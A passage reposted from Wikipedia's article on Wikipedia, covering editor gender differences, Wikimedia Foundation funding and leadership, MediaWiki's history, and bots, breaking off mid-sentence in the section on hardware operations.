A comprehensive 2008 survey, published in 2016, found significant gender differences in: confidence in expertise, discomfort with editing, and response to critical feedback. "Women reported less confidence in their expertise, expressed greater discomfort with editing (which typically involves conflict), and reported more negative responses to critical feedback compared to men."[238]

Operation

Wikimedia Foundation and Wikimedia movement affiliates

Main article: Wikimedia Foundation

Wikipedia is hosted and funded by the Wikimedia Foundation, a non-profit organization which also operates Wikipedia-related projects such as Wiktionary and Wikibooks. The foundation relies on public contributions and grants to fund its mission.[239] The foundation's 2013 IRS Form 990 shows revenue of $39.7 million and expenses of almost $29 million, with assets of $37.2 million and liabilities of about $2.3 million.[240]

In May 2014, Wikimedia Foundation named Lila Tretikov as its second executive director, taking over for Sue Gardner.[241] The Wall Street Journal reported on May 1, 2014, that Tretikov's information technology background from her years at University of California offers Wikipedia an opportunity to develop in more concentrated directions guided by her often repeated position statement that, "Information, like air, wants to be free."[242][243] The same Wall Street Journal article reported these directions of development according to an interview with spokesman Jay Walsh of Wikimedia, who "said Tretikov would address that issue (paid advocacy) as a priority. 'We are really pushing toward more transparency ... We are reinforcing that paid advocacy is not welcome.' Initiatives to involve greater diversity of contributors, better mobile support of Wikipedia, new geo-location tools to find local content more easily, and more tools for users in the second and third world are also priorities," Walsh said.[242]

Following the departure of Tretikov from Wikipedia due to issues concerning the use of the "superprotection" feature which some language versions of Wikipedia have adopted, Katherine Maher became the third executive director of the Wikimedia Foundation in June 2016.[244] Maher has stated that one of her priorities would be the issue of editor harassment endemic to Wikipedia as identified by the Wikipedia board in December. Maher stated regarding the harassment issue that: "It establishes a sense within the community that this is a priority ... (and that correction requires that) it has to be more than words."[245]

Wikipedia is also supported by many organizations and groups that are affiliated with the Wikimedia Foundation but independently-run, called Wikimedia movement affiliates. These include Wikimedia chapters (which are national or sub-national organizations, such as Wikimedia Deutschland and Wikimédia France), thematic organizations (such as Amical Wikimedia for the Catalan language community), and user groups. These affiliates participate in the promotion, development, and funding of Wikipedia.

Software operations and support

See also: MediaWiki

The operation of Wikipedia depends on MediaWiki, a custom-made, free and open sourcewiki software platform written in PHP and built upon the MySQL database system.[246] The software incorporates programming features such as a macro language, variables, a transclusion system for templates, and URL redirection. MediaWiki is licensed under the GNU General Public License (GPL) and it is used by all Wikimedia projects, as well as many other wiki projects. Originally, Wikipedia ran on UseModWiki written in Perl by Clifford Adams (Phase I), which initially required CamelCase for article hyperlinks; the present double bracket style was incorporated later. Starting in January 2002 (Phase II), Wikipedia began running on a PHP wiki engine with a MySQL database; this software was custom-made for Wikipedia by Magnus Manske. The Phase II software was repeatedly modified to accommodate the exponentially increasing demand. In July 2002 (Phase III), Wikipedia shifted to the third-generation software, MediaWiki, originally written by Lee Daniel Crocker.

Several MediaWiki extensions are installed[247] to extend the functionality of the MediaWiki software.

In April 2005, a Lucene extension[248][249] was added to MediaWiki's built-in search and Wikipedia switched from MySQL to Lucene for searching. Lucene was later replaced by CirrusSearch which is based on Elasticsearch.[250]

In July 2013, after extensive beta testing, a WYSIWYG (What You See Is What You Get) extension, VisualEditor, was opened to public use.[251][252][253][254] It was met with much rejection and criticism, and was described as "slow and buggy".[255] The feature was changed from opt-out to opt-in afterward.

Automated editing

Main article: Wikipedia bots

Computer programs called bots have often been used to perform simple and repetitive tasks, such as correcting common misspellings and stylistic issues, or to start articles such as geography entries in a standard format from statistical data.[256][257][258] One controversial contributor, Sverker Johansson, creating articles with his bot was reported to create up to 10,000 articles on the Swedish Wikipedia on certain days.[259] Additionally, there are bots designed to automatically notify editors when they make common editing errors (such as unmatched quotes or unmatched parentheses).[260] Edits falsely identified by bots as the work of a banned editor can be restored by other editors. An anti-vandal bot is programmed to detect and revert vandalism quickly.[257] Bots are able to indicate edits from particular accounts or IP address ranges, as occurred at the time of the shooting down of the MH17 jet incident in July 2014 when it was reported that edits were made via IPs controlled by the Russian government.[261] Bots on Wikipedia must be approved before activation.[262]

According to Andrew Lih, the current expansion of Wikipedia to millions of articles would be difficult to envision without the use of such bots.[263]

Hardware operations and support

See also: Wikimedia Foundation § Hardware

Wikipedia receives between 25,000 and 60,000-page requests per second, depending on the time of the day.[264][needs update] As of 2021,[update] page requests are first passed to a front-end layer of Varnish

Источник: [https://torrent-igruha.org/3551-portal.html]

2 comments

Leave a Reply

Your email address will not be published. Required fields are marked *